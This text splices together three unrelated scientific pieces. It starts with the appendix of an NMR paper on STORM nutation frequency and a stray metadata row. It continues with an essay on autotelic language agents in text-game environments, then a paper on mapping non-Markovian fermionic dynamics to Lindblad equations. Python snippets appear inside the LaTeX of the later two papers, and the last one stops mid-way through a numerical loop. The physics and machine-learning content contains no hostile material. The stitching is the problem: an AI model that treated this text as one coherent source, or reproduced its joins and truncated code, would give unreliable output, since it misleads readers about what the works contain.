\section*{Acknowledgements}
We acknowledge funding received by the Marie Skłodowska-Curie program of the European Union (grant number 766402), the European Research Council (grant 786707-FunMagResBeacons), and EPSRC-UK (grants EP/P009980/1, EP/P030491/1, EP/V055593/1). We thank Malcolm H. Levitt for valuable input and support during preparation of the manuscript.
\section*{Appendix}
\label{app:STORMnut}
\subsection*{STORM nutation frequency}
Consider the manifold defined by
\begin{equation}
\begin{aligned}
V_{1}=\{\ket{S_{0}\beta^{'}},\ket{T_{0}\alpha^{'}}, \ket{T_{-1}\alpha^{'}}\},
\end{aligned}
\end{equation}
the argument is analogous for the other manifold. The matrix representation of $\tilde{H}$ restricted to $V_{1}$ manifold is of the following form
\begin{strip}
\begin{equation}
\begin{aligned}
{[}\tilde{H}{]}_{V_{1}}=
\left[\begin{array}{ccc}
-\frac{1}{2}(\omega_{\rm eff}^{S}+3\pi J_{12})
& \frac{\pi}{2}\cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})(J_{13}-J_{23})
&
\blacksquare
\\
\frac{\pi}{2}\cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})(J_{13}-J_{23}) & -\frac{1}{2}(\omega_{\rm eff}^{S}-\pi J_{12})
&
\blacksquare
\\
\blacksquare
&
\blacksquare
&
\blacksquare
\end{array}\right],
\end{aligned}
\end{equation}
\end{strip}
where the black squares indicate non-zero, but irrelevant matrix elements.
The energy separation between the $\ket{S_{0}\beta^{'}}$ and $\ket{T_{0}\beta^{'}}$ state equals $\vert2\pi J_{12}\vert$ and is not quite sufficient to perform a TLS approximation. We thus diagonalise the corresponding subspace making use of the mixing angle
\begin{equation}
\begin{aligned}
\xi_{\rm ST}=\frac{1}{2}\arctantwo(-\frac{J_{12}}{2},\frac{J_{13}-J_{23}}{4} \cos(\theta_{\rm eff}^{I}-\theta_{\rm eff}^{S})).
\end{aligned}
\end{equation}
After the diagonalisation process the matrix representation of $\tilde{H}$ takes the form
\begin{strip}
\begin{equation}
\begin{aligned}
{[}\tilde{H}{]}_{V_{1}}=
\left[\begin{array}{ccc}
\blacksquare
& 0
&
\frac{1}{2}\omega_{ST}^\mathrm{nut}
\\
0
&
\blacksquare
&
\blacksquare
\\
\frac{1}{2}\omega_{ST}^\mathrm{nut}
&
\blacksquare
&
\blacksquare
\end{array}\right]\xrightarrow{\rm TLS\; approximation}\left[\begin{array}{cc}
\blacksquare
&
\frac{1}{2}\omega_{ST}^\mathrm{nut}
\\
\frac{1}{2}\omega_{ST}^\mathrm{nut}
&
\blacksquare
\end{array}\right],
\end{aligned}
\end{equation}
\end{strip}
where $\omega_{ST}^\mathrm{nut}$ is given by equation \ref{eq:wSTnut}.
\clearpage
| 2024-02-18T23:40:02.583Z | 2022-02-10T02:26:47.000Z | algebraic_stack_train_0000 | 1,163 | 4,982 |
|
\section{A bridge between autotelic agents and text environments}
The main point of this essay is the relevance of studying language autotelic agents in textual environments \cite{cote2018textworld, hausknecht2020interactive, wang2022scienceworld}, both for testing exploration methods in a context that is at once simple experimentally and rich from the perspective of environment interactions; and for transferring the skills of general-purpose agents trained to explore in an autonomous way to the predefined tasks of textual environment benchmarks. We identify three key properties, plus one additional benefit, of text worlds:
\vspace{5pt}
\mypara \textbf{Depth of learnable skills:} skills learnable in the world should involve multiple low-level actions and be nested, such that mastering one skill opens up the possibility of mastering more complex skills. Interactive fiction (IF) \cite{hausknecht2020interactive} games usually feature an entire narrative and extensive maps, such that navigating and passing obstacles requires many successful actions (and subgoals) to be completed. While the original TextWorld levels were not as deep as would be desirable, other non-IF text worlds such as ScienceWorld feature nested repertoires of skills (such as learning to navigate to learn to grow plants to learn the rules of Mendelian genomics);
\mypara \textbf{Breadth of the world:} there should be many paths to explore in the environment; this ensures that we train agents that are able to follow a wide diversity of possible goals, instead of learning to achieve goals along a linear path. This allows us to study generally-capable agents. Some IF games are very linear, having a clear progression from start to finish (e.g., \href{https://ifdb.org/viewgame?id=tqvambr6vowym20v}{Acorn Court}, \href{https://ifdb.org/viewgame?id=1po9rgq2xssupefw}{Detective}); others have huge maps that an agent has to explore before it can progress in the quest (e.g., \href{https://ifdb.org/viewgame?id=0dbnusxunq7fw5ro}{Zork}, \href{https://ifdb.org/viewgame?id=ouv80gvsl32xlion}{Hitchhiker's Guide to the Galaxy}). Exploration heuristics are a part of some successful methods for playing IF with RL \cite{yao2020keep}. ScienceWorld \cite{wang2022scienceworld} has an underlying physical engine allowing for a combinatorial explosion of possibilities like making new objects, combining existing objects, changing states of matter, etc.
\mypara \textbf{Niches of progress}: real-world environments have both easy skills and unlearnable skills. Our simulated environments should mimic this property to test the agent's ability to focus only on highly learnable parts of the space and avoid spending effort on uncontrollable aspects of the environment. In textual environments, high depth implies that some skills are much more learnable than others, already implementing some progress niches. The combinatorial property of language goals allows us to define many unfeasible goals, goals that an autotelic agent has to avoid spending too many resources on.
\mypara \textbf{Language representation for goals:} a language-conditioned agent has to learn to ground its goal representation in its environment \cite{harnad1990symbol, hill2020grounded}, to know when a given observation or sequence of observations satisfies a given goal, or to know what goals were achieved in a given trajectory. This grounding is made much simpler in environments with a single modality; relating language goals to language observations is simpler than grounding language in pixels or image embeddings. This allows us to study language-based exploration in a simpler context.
\vspace{5pt}
\setcounter{para}{0}
\section{Drivers of exploration in autotelic agents}
We identify three main drivers of exploration in autotelic agents. Environments we use should support exploration algorithms that implement these principles; the resulting agents then have a chance to acquire a diverse set of skills that can be repurposed for solving the benchmarks proposed by textual environments.
\vspace{5pt}
\mypara \textbf{Goal self-curriculum:} automatic goal selection \cite{portelas2020automatic} allows the agent to refine its skills on the edge of what it currently masters. Among metrics used to select goals are novelty/surprise of a goal \cite{tam2022semantic, burda2018exploration}, intermediate competence on goals \cite{campero2020learning}, ensemble disagreement \cite{pathak2019self}, or (absolute) learning progress \cite{colas2019curious}. Progress niches in textual environments support such goal curriculum;
\mypara \textbf{Additional exploration after goal achievement:} after achieving a given goal, the agent continues to run for a time to push the boundary of explored space \cite{ecoffet2021first}. The depth of text worlds makes goal chaining relevant, such that an agent that has achieved a known goal can imagine additional goals to pursue. Random exploration can also be used once a known goal has been achieved. Agents exploring in textual environments and choosing uniformly among the set of valid actions in a given state have a high chance of effecting meaningful changes in the environment, making discovery of new skills probable. This property is relevant in any environment with high depth, and both IF and ScienceWorld fit this description.
\mypara \textbf{Goal composition:} as mentioned above, this means using the compositionality afforded by language goals to imagine novel goals in the environment \cite{colas2020language}. Goal-chaining is an example of composition, but language offers many other composition possibilities, such as recombining known verbs, nouns and attributes in novel ways, or making analogies. This is relevant if there exists some transfer between the skills required to accomplish similar goal constructions (e.g., picking up an apple and picking up a carrot requires very similar actions if both are in the kitchen). This is at least partially true in textual environments where objects of the same type usually have similar affordances.
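The first of these drivers can be made concrete with a short sketch. The snippet below is only a minimal illustration of the learning-progress idea (all names are hypothetical and it does not reproduce any of the cited implementations): goals are sampled in proportion to absolute learning progress, estimated as the change between recent and older success rates, so that goals currently being mastered (or forgotten) are favored over goals that are already trivial or still impossible.

```python
import random
from collections import deque

class LPGoalSampler:
    """Sample goals in proportion to absolute learning progress (LP).

    LP for a goal is the absolute difference between the success rate
    over the most recent `window` attempts and the `window` attempts
    before that.
    """

    def __init__(self, goals, window=10, eps=0.1):
        self.goals = list(goals)
        self.window = window
        self.eps = eps  # small chance of uniform sampling, for coverage
        self.history = {g: deque(maxlen=2 * window) for g in self.goals}

    def update(self, goal, success):
        """Record the outcome (True/False) of one attempt at `goal`."""
        self.history[goal].append(float(success))

    def learning_progress(self, goal):
        h = list(self.history[goal])
        if len(h) < 2 * self.window:
            return 1.0  # optimistic value: attempt rarely-tried goals
        old = sum(h[: self.window]) / self.window
        new = sum(h[self.window :]) / self.window
        return abs(new - old)

    def sample(self):
        """Pick the next goal to pursue."""
        if random.random() < self.eps:
            return random.choice(self.goals)
        weights = [self.learning_progress(g) for g in self.goals]
        if sum(weights) == 0.0:  # no progress anywhere: fall back to uniform
            return random.choice(self.goals)
        return random.choices(self.goals, weights=weights, k=1)[0]
```

The optimistic initial value for rarely-tried goals is one possible design choice for ensuring that new regions of a large language goal space still get visited before their LP estimate is reliable.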
\vspace{5pt}
\section{Challenges for autotelic textual agents}
\setcounter{para}{0}
Text worlds bring a set of unique challenges for autotelic agents, among which we foresee:
\mypara The goal space can be very large. An agent with a limited training budget needs to focus on a subset of the goal space, possibly discovering only a fraction of what is discoverable within the environment. This calls for finer goal-sampling approaches that encourage the agent to make the most of its allocated time to explore the environment. In addition, we need better methods to push the agent's exploration towards certain parts of the space (e.g., warm-starting the replay buffer with existing trajectories, providing linguistic common-sense knowledge);
\mypara The action space is also very large in textual environments, making exploration (especially methods based on random action selection) potentially challenging.
\mypara Agents must be trajectory-efficient for a given goal; complex goals might be seen only once;
\mypara Catastrophic forgetting needs to be alleviated, so that learning to achieve new goals does not impair the skills learned previously;
\mypara Partial observability means that agent architectures need to include some form of memory.
\vspace{5pt}
Agents trained in such environments will learn a form of language use, not by predicting the most likely sequence of words from a large-scale dataset \cite{Radford2018ImprovingLU, brown2020language} but by learning to use it pragmatically to effect changes in the environment. Of course, the limits of the autotelic agent's world will mean the limits of its language; an interesting development is to build agents that explore textual environments to refine external linguistic knowledge provided by a pretrained language model. This external knowledge repository can be seen as culturally-accumulated common sense, a perspective that is related to so-called Vygotskian AI \cite{colas:tel-03337625} in which a developmental agent learns by interacting with an external social partner that imparts outside language knowledge and organizes the world so as to facilitate the autotelic agent's exploration.
\vspace{5pt}
To conclude, textual environments are ideal testbeds for autotelic language-conditioned agents, and conversely such agents can bring progress on text world benchmarks. There is also promise in the interaction between exploratory agents and large language models encoding exterior linguistic knowledge. Preliminary steps have been taken in this direction \cite{madotto2020exploration} but the full breadth of drivers of exploration we identify has yet to be studied. We hope to foster discussion, define concrete implementations and identify challenges by bringing together the developmental perspective on AI and the textual environment community.
|
\section{Introduction}
Open nonequilibrium systems are at the forefront of experimental and theoretical research due to the rich and complex physics
they provide access to, as well as the prospect of building nanoscale devices for quantum-based technologies
and computations~\cite{jiang_repetitive_2009,khasminskaya_fully_2016,gaita-arino_molecular_2019}.
Especially intriguing in terms of both fundamental science and potential applications are the effects of strong correlations.
A number of impurity solvers capable of treating strongly correlated systems coupled to a continuum of
bath degrees of freedom have been developed. Among them are the numerical renormalization group in the basis of scattering
states~\cite{anders_steady-state_2008,schmitt_comparison_2010},
flow equations~\cite{wegner_flow-equations_1994,kehrein_flow_2006},
time-dependent density matrix renormalization group~\cite{schollwock_density-matrix_2005,schollwock_density-matrix_2011},
multilayer multiconfiguration time-dependent Hartree (ML-MCTDH)~\cite{wang_numerically_2009,wang_multilayer_2018},
and continuous time quantum Monte Carlo~\cite{cohen_taming_2015,antipov_currents_2017,ridley_numerically_2018}
approaches. These numerically exact techniques are very demanding and so far are mostly applicable to simple models only.
At the same time, accurate and numerically inexpensive impurity solvers are in great demand, both as standalone techniques
to be applied in simulations of, e.g., nanoscale junctions and as part of divide-and-conquer schemes such as
dynamical mean-field theory (DMFT)~\cite{anisimov_electronic_2010,aoki_nonequilibrium_2014}.
In this respect, the ability to map the complicated non-Markovian dynamics of a system onto
a much simpler Markovian description is an important step towards creating new computational techniques
applicable in realistic simulations. In particular, such a mapping was used in the auxiliary master equation approach (AMEA)~\cite{arrigoni_nonequilibrium_2013,dorda_auxiliary_2014},
which introduced a numerically inexpensive and fairly accurate solver for nonequilibrium DMFT.
Another example is recent formulation of the auxiliary dual-fermion method~\cite{chen_auxiliary_2019}.
While the mappings appear to be very useful and accurate, only semi-quantitative arguments for possibility of the mapping
were presented with main supporting evidence being benchmarking vs. numerically exact computational techniques.
In particular, a justification for the mapping was argued in Refs.~\cite{schwarz_lindblad-driven_2016,dorda_optimized_2017,Arrigoni2018} based upon the singular coupling derivation of the Lindblad equation.
Still, the consideration is not rigorous.
Recently, a rigorous proof of the non-Markov to Markov mapping for open Bose quantum systems was presented in the literature~\cite{tamascelli_nonperturbative_2018}.
It was shown that the evolution of the reduced density matrix of a non-Markovian system with unitary system-environment evolution can be
equivalently represented by the Markovian evolution of an extended system (the system plus modes of the environment)
under non-unitary (Lindblad-type) dynamics. Here, we extend the consideration of Ref.~\cite{tamascelli_nonperturbative_2018}
to fermionic open quantum systems and to multi-time correlation functions.
The structure of the paper is as follows. After introducing the physical and auxiliary models of an open quantum Fermi
system in Section~\ref{model}, we discuss the non-Markov to Markov mapping procedure
in Section~\ref{map}. Exact mathematical proofs are given in the Appendices. Section~\ref{numres} presents a numerical illustration of
the mapping for a simple generic model of a junction. We conclude in Section~\ref{conclude}.
\begin{figure}[b]
\centering\includegraphics[width=\linewidth]{fig1}
\caption{\label{fig1}
Sketch of an open fermionic system $S$. Shown are
(a) the physical system coupled to $N$ baths and
(b) an illustration of the auxiliary system with couplings to a full (left) and an empty (right) bath.
}
\end{figure}
\section{Models}\label{model}
We consider an open fermionic system $S$ coupled to an arbitrary number $N$ of external baths,
initially each at its own thermodynamic equilibrium, i.e. characterized by its own electrochemical potential and temperature
(see Fig.~\ref{fig1}a). The Hamiltonian of the model is
\begin{equation}
\label{Hphys}
\hat H^{phys}(t) = \hat H_S(t) + \sum_{B=1}^{N}\bigg( \hat H_{B} + \hat V_{SB} \bigg)
\end{equation}
Here $\hat H_S(t)$ and $\hat H_B$ ($B\in\{1,\ldots,N\}$) are the Hamiltonians of the system and of the baths.
$\hat V_{SB}$ introduces the coupling of the system to bath $B$.
While the Hamiltonian of the system is general and may be time-dependent, we follow the usual paradigm
in constructing fermionic junction models by assuming bilinear coupling.
\begin{eqnarray}
\hat H_B &= \sum_{k\in B} \varepsilon_{B\, k}\hat c_{Bk}^\dagger\hat c_{Bk}
\\
\hat V_{SB} &= \sum_{k\in B} \sum_{i\in S}\bigg( V_{i,Bk} \hat d_i^\dagger\hat c_{Bk} + H.c. \bigg)
\end{eqnarray}
where $\hat d_i^\dagger$ ($\hat d_i$) and $\hat c_{Bk}^\dagger$ ($\hat c_{Bk}$) create (annihilate)
an electron in level $i$ of the system $S$ and level $k$ of bath $B$, respectively.
In this model, the dynamics of the system plus baths is unitary. Below we call this model $phys$ (physical).
We note in passing that the extension of the consideration to other types of system-bath couplings is straightforward,
as long as the baths are quadratic in the Fermi operators.
The other configuration we consider is a model we shall call $aux$ (auxiliary; see Fig.~\ref{fig1}b). Here, the same system $S$
is coupled to a number of auxiliary modes $A$, which in turn are coupled to two baths. There are two Fermi baths in this
configuration: one ($L$) is completely full ($\mu_L\to+\infty$), the other ($R$) is completely empty ($\mu_R\to-\infty$).
The Hamiltonian of the model is
\begin{equation}
\hat H^{aux}(t) = \hat H_{S}(t) + \hat V_{SA} + \hat H_A + \sum_{C=L,R}\bigg( \hat H_C + \hat V_{AC} \bigg)
\end{equation}
where $\hat H_S$ is the same as in (\ref{Hphys}), $\hat H_A$ represents the set of auxiliary modes
\begin{equation}
\hat H_A = \sum_{m_1,m_2\in A} H^{A}_{m_1m_2}\hat a_{m_1}^\dagger\hat a_{m_2}
\end{equation}
and $\hat V_{SA}$ their interaction with the system
\begin{equation}
\hat V_{SA} = \sum_{i\in S}\sum_{m\in A}\bigg( V^{SA}_{i m}\hat d_i^\dagger\hat a_m + H.c. \bigg)
\end{equation}
Here $\hat a_m^\dagger$ ($\hat a_m$) creates (annihilates) an electron in the auxiliary mode $m$ in $A$.
$\hat H_C$ represents the continuum of states in contact $C$
\begin{equation}
\hat H_C = \sum_{k\in C}\varepsilon_{Ck} \hat c_{Ck}^\dagger\hat c_{Ck}
\end{equation}
with constant density of states
\begin{equation}
N_C(E) \equiv \sum_{k\in C} \delta(E-\varepsilon_{Ck}) = \mathrm{const}
\end{equation}
and $\hat V_{AC}$ couples auxiliary modes $A$ to bath $C$ ($L$ or $R$)
\begin{equation}
\hat V_{AC} = \sum_{k\in C} \sum_{m\in A}\bigg( t^C_m\hat a^\dagger_m \hat c_{Ck} + H.c. \bigg)
\end{equation}
The dynamics of the whole configuration is unitary.
In the next section we show that the reduced time evolution of $S$ is the same in models $phys$ and $aux$
(subject to certain conditions)
and that the reduced dynamics of $S+A$ in model $aux$ satisfies an appropriate Lindblad Markovian evolution.
This establishes a procedure in which a Markovian, non-unitary Lindblad-type treatment of $S+A$ in $aux$,
with the $A$ degrees of freedom subsequently traced out, exactly represents the unitary non-Markovian dynamics of $S$ in $phys$.
\section{Non-Markov to Markov mapping}\label{map}
First, we are going to prove that, with an appropriate choice of parameters of $aux$, the dynamics of $S$
can be equivalently represented in the original model $phys$
and in the auxiliary model $aux$, under the assumption that the dynamics of the whole system is unitary.
Because non-interacting baths are fully characterized by their two-time correlation functions,
equivalence of the system-bath hybridization functions (i.e., correlation functions of the baths dressed with the system-bath interactions)
in the two models implies equivalence of the reduced system dynamics in the two cases.
For example, the hybridization function is the only information about the baths required in numerically exact
simulations of strongly correlated systems~\cite{antipov_currents_2017}. The nonequilibrium character of the system
requires fitting two projections of the hybridization function (also called the self-energy in the literature); in particular, these may be
the retarded and Keldysh projections. Let $\Sigma_B^r(E)$ and $\Sigma_B^K(E)$ be the matrices
introducing the corresponding hybridization functions
for bath $B$ of the physical problem (Fig.~\ref{fig1}a).
\begin{eqnarray}
\big(\Sigma_B^r(E)\big)_{ij} &= \sum_{k\in B} V_{i,Bk}\, g^r_{Bk}(E)\, V_{Bk,j}
\\
\big(\Sigma_B^K(E)\big)_{ij}&= \sum_{k\in B} V_{i,Bk}\, g^K_{Bk}(E)\, V_{Bk,j}
\end{eqnarray}
where $g^{r\, (K)}_{Bk}(E)$ are the Fourier transforms of retarded (Keldysh) projections of the free
electron Green's function $g_{Bk}(\tau,\tau')=-i\langle T_c\,\hat c_{Bk}(\tau)\,\hat c_{Bk}^\dagger(\tau')\rangle$.
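As an aside, for a discretized bath the retarded hybridization can be evaluated directly from its definition with a small broadening $\eta$; the short Python sketch below does this for a hypothetical flat band with constant couplings (all numbers illustrative, not taken from the paper). Inside the band, $-2\,\mathrm{Im}\,\Sigma^r(E)$ then approximates the escape rate $2\pi\sum_k |V_k|^2\delta(E-\varepsilon_k)$.

```python
import numpy as np

def sigma_r(E, eps_k, V_k, eta=0.05):
    """Retarded hybridization Sigma^r(E) = sum_k |V_k|^2 / (E - eps_k + i*eta)
    for a single system level coupled to a discretized bath."""
    return np.sum(np.abs(V_k) ** 2 / (E - eps_k + 1j * eta))

# hypothetical flat bath: 400 levels on [-2, 2] with constant coupling 0.05
eps_k = np.linspace(-2.0, 2.0, 400)
V_k = np.full_like(eps_k, 0.05)

E_grid = np.linspace(-3.0, 3.0, 7)
vals = np.array([sigma_r(E, eps_k, V_k) for E in E_grid])
# inside the band, -2*Im Sigma^r(E) approximates the escape rate
# Gamma(E) = 2*pi*sum_k |V_k|^2 * delta(E - eps_k) = 2*pi*|V|^2*rho
```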
Then the total hybridization functions of the system,
\begin{eqnarray}
\Sigma^r(E) &= \sum_{B=1}^{N} \Sigma_B^r(E)
\\
\Sigma^K(E) &= 2\, i\sum_{B=1}^{N} \bigg(1-2f_B(E)\bigg)\mbox{Im}\,\Sigma^r_B(E)
\end{eqnarray}
must be identical to the corresponding hybridization functions, $\tilde\Sigma^r(E)$ and $\tilde\Sigma^K(E)$,
of $S$ in the auxiliary model (Fig.~\ref{fig1}b). The latter have contributions from the full ($L$) and empty ($R$) baths
and from the auxiliary modes ($A$),
\begin{eqnarray}
\tilde\Sigma^r(E) &= \tilde\Sigma^r_L(E) + \tilde\Sigma^r_R(E)
\\
\tilde\Sigma^K(E) &= 2\,i\,\mbox{Im}\bigg(\tilde\Sigma^r_R(E)-\tilde\Sigma^r_L(E)\bigg)
\end{eqnarray}
where we assume the modes $A$ to be initially in a stationary state.
The requirement of equivalence can be expressed as
\begin{eqnarray}
\mbox{Im}\,\tilde\Sigma^r_L(E) &= \frac{2\, i\,\mbox{Im}\Sigma^r(E)+\Sigma^K(E)}{4\,i}
\\
\mbox{Im}\,\tilde\Sigma^r_R(E) &= \frac{2\, i\,\mbox{Im}\Sigma^r(E)-\Sigma^K(E)}{4\,i}
\end{eqnarray}
Thus, the problem reduces to fitting the known functions on the right-hand side of these expressions with multiple contributions
from the auxiliary modes to the hybridization functions on the left-hand side.
In principle, this fitting can be done in many different ways~\cite{dorda_optimized_2017}.
For example, the possibility of exactly fitting an arbitrary function with a
set of Lorentzians was discussed in Ref.~\cite{imamoglu_stochastic_1994}.
In auxiliary systems such a fit corresponds to
a construction where each auxiliary mode is coupled to its own bath.
Note that in practical simulations the accuracy of the results can be improved either by increasing the number of auxiliary modes,
as is implemented in, e.g., AMEA~\cite{dorda_auxiliary_2015}, or by employing a diagrammatic expansion in the difference
between the true and fitted hybridization functions,
as is realized in, e.g., the dual-fermion approach~\cite{jung_dual-fermion_2012}, or both.
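To illustrate the Lorentzian-fitting step, note that when each auxiliary mode is coupled to its own bath and the Lorentzian centers and widths are fixed in advance, only the weights remain to be determined, and that subproblem is linear. The sketch below (an illustration under these assumptions, with a hypothetical edge-softened flat band as the target $-\mathrm{Im}\,\tilde\Sigma^r_L$) solves it by ordinary least squares.

```python
import numpy as np

def lorentzian(E, center, width):
    # unit-height Lorentzian centered at `center` with half-width `width`
    return width**2 / ((E - center)**2 + width**2)

E = np.linspace(-3, 3, 601)
# hypothetical target: a flat band of height 0.5 with smooth edges at |E| = 2
target = 0.5 / (1.0 + np.exp(4.0 * (np.abs(E) - 2.0)))

# fixed centers/widths (one Lorentzian per auxiliary mode); with these fixed,
# fitting the weights is a linear least-squares problem
centers = np.linspace(-2.5, 2.5, 11)
width = 0.5
A = np.stack([lorentzian(E, c, width) for c in centers], axis=1)
weights, *_ = np.linalg.lstsq(A, target, rcond=None)
fit = A @ weights
rms = np.sqrt(np.mean((fit - target) ** 2))
```

In practice the weights would be constrained to be non-negative (they play the role of $|t_m|^2$-like couplings), which turns the problem into non-negative least squares; the unconstrained version above is the simplest starting point.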
Now that the equivalence of the reduced system ($S$) dynamics in $phys$ and $aux$ has been established, we turn to
the evolution of the $aux$ model. We will show that the reduced $S+A$ dynamics derived from the unitary evolution
of the $aux$ model can be exactly represented by a non-unitary Lindblad-type evolution.
Following Ref.~\cite{tamascelli_nonperturbative_2018}, we consider the reduced density operator of $S+A$ in $aux$,
$\hat \rho_{SA}$, which is defined by integrating out the bath degrees of freedom of the total density operator
$\hat\rho^{aux}(t)$
\begin{equation}
\hat\rho_{SA}(t)\equiv \mbox{Tr}_{LR}\bigg[\hat\rho^{aux}(t)\bigg]
\end{equation}
The latter follows unitary evolution with the initial condition that $S+A$ is decoupled from the baths,
\begin{equation}
\label{rhoaux0}
\hat\rho^{aux}(0) = \hat\rho_L\otimes\hat\rho_{SA}(0)\otimes\hat\rho_R
\end{equation}
where $\hat\rho_L=\vert full\rangle\langle full\vert$ and $\hat\rho_R=\vert empty\rangle\langle empty\vert$.
In Appendix~\ref{appA} we prove that $\hat\rho_{SA}(t)$ satisfies the Markovian Lindblad-type equation of motion
\begin{align}
\label{rho_EOM}
&\frac{d}{dt} \hat\rho_{SA}(t) = -i\bigg[\hat H_{SA}(t),\hat \rho_{SA}(t)\bigg] + \sum_{m_1,m_2\in A}\bigg[
\nonumber \\ & \quad
\Gamma^R_{m_1m_2}\bigg(\hat a_{m_2}\hat\rho_{SA}(t)\hat a_{m_1}^\dagger-\frac{1}{2}\left\{\hat\rho_{SA}(t),\hat a_{m_1}^\dagger\hat a_{m_2}\right\}\bigg)
\\ &
+\Gamma^L_{m_1m_2}\bigg(\hat a_{m_1}^\dagger\hat\rho_{SA}(t)\hat a_{m_2}-\frac{1}{2}\left\{\hat\rho_{SA}(t),\hat a_{m_2}\hat a_{m_1}^\dagger\right\}\bigg)
\bigg]
\nonumber \\
&\equiv \mathcal{L}_{SA}(t) \vert\rho_{SA}(t)\rangle\rangle
\nonumber
\end{align}
where
\begin{equation}
\hat H_{SA}(t)\equiv \hat H_S(t)+\hat V_{SA}+\hat H_A,
\end{equation}
$\mathcal{L}_{SA}$ is the Liouvillian superoperator defined on the $S+A$ subspace of the $aux$ model and
\begin{equation}
\label{Gammadef}
\Gamma^C_{m_1m_2}\equiv 2\pi t^C_{m_1} (t_{m_2}^{C})^{*} N_C \qquad (C=L,R)
\end{equation}
is the dissipation matrix due to coupling to contact $C$.
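As a minimal numerical check of the structure of Eq.~(\ref{rho_EOM}) (an illustration, not part of the derivation), the sketch below propagates a single fermionic mode playing the role of $S+A$, with scalar rates $\Gamma^L$ and $\Gamma^R$ whose values are hypothetical. The full bath feeds the creation-operator dissipator and the empty bath the annihilation-operator one, so the steady-state population must be $\Gamma^L/(\Gamma^L+\Gamma^R)$, which the time stepping reproduces.

```python
import numpy as np

# single fermionic mode in the Fock basis {|0>, |1>}
a = np.array([[0.0, 1.0], [0.0, 0.0]])   # annihilation operator
ad = a.T.conj()
n = ad @ a

eps, gL, gR = 0.5, 0.3, 0.7              # hypothetical parameters
H = eps * n

def lindblad_rhs(rho):
    """Right-hand side of Eq. (rho_EOM) for one mode with scalar Gamma^{L,R}."""
    comm = -1j * (H @ rho - rho @ H)
    dR = gR * (a @ rho @ ad - 0.5 * (rho @ ad @ a + ad @ a @ rho))
    dL = gL * (ad @ rho @ a - 0.5 * (rho @ a @ ad + a @ ad @ rho))
    return comm + dR + dL

rho = np.diag([1.0, 0.0]).astype(complex)  # initially empty level
dt, nsteps = 0.01, 2000                    # evolve to t = 20 with RK4
for _ in range(nsteps):
    k1 = lindblad_rhs(rho)
    k2 = lindblad_rhs(rho + 0.5 * dt * k1)
    k3 = lindblad_rhs(rho + 0.5 * dt * k2)
    k4 = lindblad_rhs(rho + dt * k3)
    rho = rho + dt / 6.0 * (k1 + 2 * k2 + 2 * k3 + k4)

pop = np.real(np.trace(rho @ n))  # -> Gamma_L/(Gamma_L+Gamma_R) = 0.3
```

Direct Runge-Kutta stepping of the small density matrix is used here instead of building the Liouvillian supermatrix; for larger $S+A$ spaces the vectorized superoperator form of $\mathcal{L}_{SA}$ is the more common choice.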
\begin{figure}[htbp]
\centering\includegraphics[width=0.8\linewidth]{fig2}
\caption{\label{fig2}
The Keldysh contour.
}
\end{figure}
Next we turn to multi-time correlation functions of operators in the $S+A$ subspace of the $aux$ model.
Following Ref.~\cite{tamascelli_nonperturbative_2018}, we start the consideration from the two-time correlation function on the real time axis.
For arbitrary operators $\hat O_1$ and $\hat O_2$ in $S+A$ we define the two-time ($t_1\geq t_2\geq 0$)
correlation function as
\begin{align}
\label{corr2rt}
& \langle\hat O_1(t_1)\hat O_2(t_2)\rangle \equiv
\\ &
\mbox{Tr}\bigg[\hat O_1\,\hat U^{aux}(t_1,t_2)\,\hat O_2\,\hat U^{aux}(t_2,0)\,\hat \rho^{aux}(0)\,\hat U^{aux\,\dagger}(t_1,0)\bigg]
\nonumber
\end{align}
Here $\hat U^{aux}$ is the evolution operator in the $aux$ system
\begin{equation}
\label{Uaux}
\hat U^{aux}(t,t') \equiv T \exp\bigg[-i\int_{t'}^{t}ds\, \hat H^{aux}(s)\bigg]
\end{equation}
and $T$ is the time-ordering operator.
In Appendix~\ref{appB} we show that (\ref{corr2rt}) can be equivalently obtained from the reduced Lindblad-type evolution in
the $S+A$ subspace,
\begin{align}
\label{corr2rt_EOM}
&\langle\hat O_1(t_1)\hat O_2(t_2)\rangle =
\\ &\quad
\langle\langle I\vert \mathcal{O}^{-}_1\,\mathcal{U}_{SA}(t_1,t_2)\,
\mathcal{O}^{-}_{2}\,\mathcal{U}_{SA}(t_2,0)\,\vert\rho_{SA}(0)\rangle\rangle
\nonumber
\end{align}
Here $\langle\langle I\vert$ is the Liouville space bra representation of the Hilbert space identity operator,
$\mathcal{O}_i$ is the Liouville space superoperator corresponding to the Hilbert space operator $\hat O_i$
(see Fig.~\ref{fig2}),
\begin{equation}
\label{superop}
\mathcal{O}_i \vert \rho\rangle\rangle = \left\{
\begin{array}{cc}
\mathcal{O}_i^{-} \vert \rho\rangle\rangle \equiv \hat O_i\,\hat\rho & \mbox{forward branch}
\\
\mathcal{O}_i^{+} \vert \rho\rangle\rangle \equiv \hat\rho\,\hat O_i & \mbox{backward branch}
\end{array}
\right.
\end{equation}
and $\mathcal{U}_{SA}$ is the Liouville space evolution superoperator
\begin{equation}
\label{ULiouv}
\mathcal{U}_{SA}(t,t') \equiv T \exp\bigg[\int_{t'}^t ds\,\mathcal{L}_{SA}(s)\bigg]
\end{equation}
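To make Eq.~(\ref{corr2rt_EOM}) concrete, the sketch below evaluates $\langle \hat a^\dagger(t)\,\hat a(0)\rangle$ for a single fermionic mode attached to one full and one empty bath (illustrative parameters; this toy stands in for the full $S+A$ model): $\mathcal{O}^-_2$ acts as left multiplication on the steady state, the result is propagated with the same Lindblad generator that evolves the density matrix, and the trace with $\hat O_1$ closes the expression. For this toy model the answer can be worked out by hand as $\bar n\, e^{(i\varepsilon-\Gamma/2)t}$ with $\Gamma=\Gamma^L+\Gamma^R$.

```python
import numpy as np

# single fermionic mode in the Fock basis {|0>, |1>}; illustrative parameters
a = np.array([[0.0, 1.0], [0.0, 0.0]])
ad = a.T.conj()
eps, gL, gR = 0.5, 0.3, 0.7
H = eps * (ad @ a)

def lindblad_rhs(X):
    # the same generator L_SA of Eq. (rho_EOM) also propagates the
    # conditional operator between the two times (regression structure)
    out = -1j * (H @ X - X @ H)
    out += gR * (a @ X @ ad - 0.5 * (X @ ad @ a + ad @ a @ X))
    out += gL * (ad @ X @ a - 0.5 * (X @ a @ ad + a @ ad @ X))
    return out

nbar = gL / (gL + gR)
rho_ss = np.diag([1.0 - nbar, nbar]).astype(complex)  # steady state

# <a†(t) a(0)>: apply O2^- = a. , propagate with L_SA, close with O1^- = a†.
X = a @ rho_ss
t, dt = 1.0, 0.001
for _ in range(int(t / dt)):                          # RK4 stepping
    k1 = lindblad_rhs(X)
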